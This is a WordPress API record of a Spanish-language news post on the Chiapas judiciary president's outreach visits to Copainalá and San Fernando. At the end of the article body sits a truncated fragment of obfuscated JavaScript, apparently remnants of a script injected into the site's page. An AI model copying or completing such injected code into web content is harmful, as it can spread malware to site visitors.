{"id":25468,"date":"2025-11-26T05:02:20","date_gmt":"2025-11-26T05:02:20","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=25468"},"modified":"2025-11-26T05:02:21","modified_gmt":"2025-11-26T05:02:21","slug":"juan-carlos-moreno-guillen-acerca-la-justicia-a-copainala-y-san-fernando","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=25468","title":{"rendered":"Juan Carlos Moreno Guill\u00e9n acerca la justicia a Copainal\u00e1 y San Fernando"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"714\" data-id=\"25469\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000458051-1024x714.jpg\" alt=\"\" class=\"wp-image-25469\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000458051-1024x714.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000458051-300x209.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000458051-768x536.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000458051.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"714\" data-id=\"25470\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000458206-1024x714.jpg\" alt=\"\" class=\"wp-image-25470\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000458206-1024x714.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000458206-300x209.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000458206-768x536.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000458206-1536x1072.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000458206-2048x1429.jpg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" data-id=\"25473\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000458204-1024x683.jpg\" alt=\"\" class=\"wp-image-25473\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000458204-1024x683.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000458204-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000458204-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000458204-1536x1024.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000458204-2048x1365.jpg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"660\" data-id=\"25471\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000457898-1024x660.jpg\" alt=\"\" class=\"wp-image-25471\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000457898-1024x660.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000457898-300x193.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000457898-768x495.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000457898.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" data-id=\"25474\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000458202-1024x682.jpg\" alt=\"\" class=\"wp-image-25474\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000458202-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000458202-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000458202-768x511.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000458202-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000458202.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" data-id=\"25472\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000457895-1024x682.jpg\" alt=\"\" class=\"wp-image-25472\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000457895-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000457895-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000457895-768x511.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000457895-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000457895.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Poder Judicial fortalece espacios comunitarios de encuentro y corresponsabilidad ciudadana.<\/li>\n<\/ul>\n\n\n\n<p>25 de noviembre del 2025. Habitantes y representantes de la sociedad civil de los municipios de Copainal\u00e1 y San Fernando se reunieron para participar en un encuentro significativo y directo con el magistrado presidente del Poder Judicial del Estado, Juan Carlos Moreno Guill\u00e9n, en las jornadas del programa \u201cAcercando la Justicia al Pueblo\u201d, realizadas en dichas localidades.<\/p>\n\n\n\n<p>En estas visitas, la ciudadan\u00eda expres\u00f3 el reconocimiento al titular de la casa de la justicia por la apertura de esta instituci\u00f3n, impulsando iniciativas que favorecen los lazos de comunicaci\u00f3n y vinculaci\u00f3n directa del Poder Judicial y la sociedad chiapaneca.<\/p>\n\n\n\n<p>Por su parte, en el municipio de Copinal\u00e1, acompa\u00f1ado por el presidente municipal Carlos Cruz Cruz, el magistrado presidente manifest\u00f3 que una de las apuestas que se tiene es fortalecer la justicia social, y dejar los cimientos para que las nuevas administraciones sigan trabajando con humanismo por el bienestar de Chiapas.<\/p>\n\n\n\n<p>Adem\u00e1s, asegur\u00f3 que ahora, gracias a la reforma judicial, las personas juzgadoras dar\u00e1n la cara y ser\u00e1n agentes proactivos en la sociedad, tendr\u00e1n que salir de su oficina, dar conferencias en las escuelas, entrevistas, y eso abonar\u00e1 a que la gente sepa el funcionamiento y el importante quehacer del Poder Judicial.<\/p>\n\n\n\n<p>Mientras que, en San Fernando, el titular del Tribunal Superior de Justicia y del Consejo de la Judicatura subray\u00f3 que la labor de las y los juzgadores abona en la construcci\u00f3n de la paz, porque son quienes dictan las \u00f3rdenes de aprehensi\u00f3n, vinculaciones y las sentencias que no permiten la impunidad; por ello, es fundamental este programa que permite la cercan\u00eda con la sociedad, para que las y los chiapanecos puedan reconocer la labor de esta instituci\u00f3n.<\/p>\n\n\n\n<p>Ante la presencia del alcalde de San Fernando, Edilberto Guti\u00e9rrez Aguilar, Moreno Guill\u00e9n exhort\u00f3 a la poblaci\u00f3n a acercarse, solicitar orientaci\u00f3n y atenci\u00f3n, porque las instituciones est\u00e1n para servir y brindar apoyo a quienes lo necesiten.<\/p>\n\n\n\n<p>Finalmente, en cada uno de estos encuentros finaliz\u00f3 con una sesi\u00f3n abierta de preguntas, donde las personas participantes compartieron sus experiencias y recibieron orientaci\u00f3n por parte de las y los integrantes de la casa de la justicia chiapaneca, consolidando este programa como un espacio comunitario de encuentro y corresponsabilidad ciudadana.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Poder Judicial fortalece espacios comunitarios de encuentro y corresponsabilidad ciudadana. 25 de noviembre del 2025. Habitantes y representantes de la sociedad civil de los municipios de Copainal\u00e1 y San Fernando se reunieron para participar en un encuentro significativo y directo con el magistrado presidente del Poder Judicial del Estado, Juan Carlos Moreno Guill\u00e9n, en las &hellip;<\/p>\n","protected":false},"author":2,"featured_media":25469,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-25468","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25468","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=25468"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25468\/revisions"}],"predecessor-version":[{"id":25475,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25468\/revisions\/25475"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/25469"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=25468"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=25468"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=25468"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}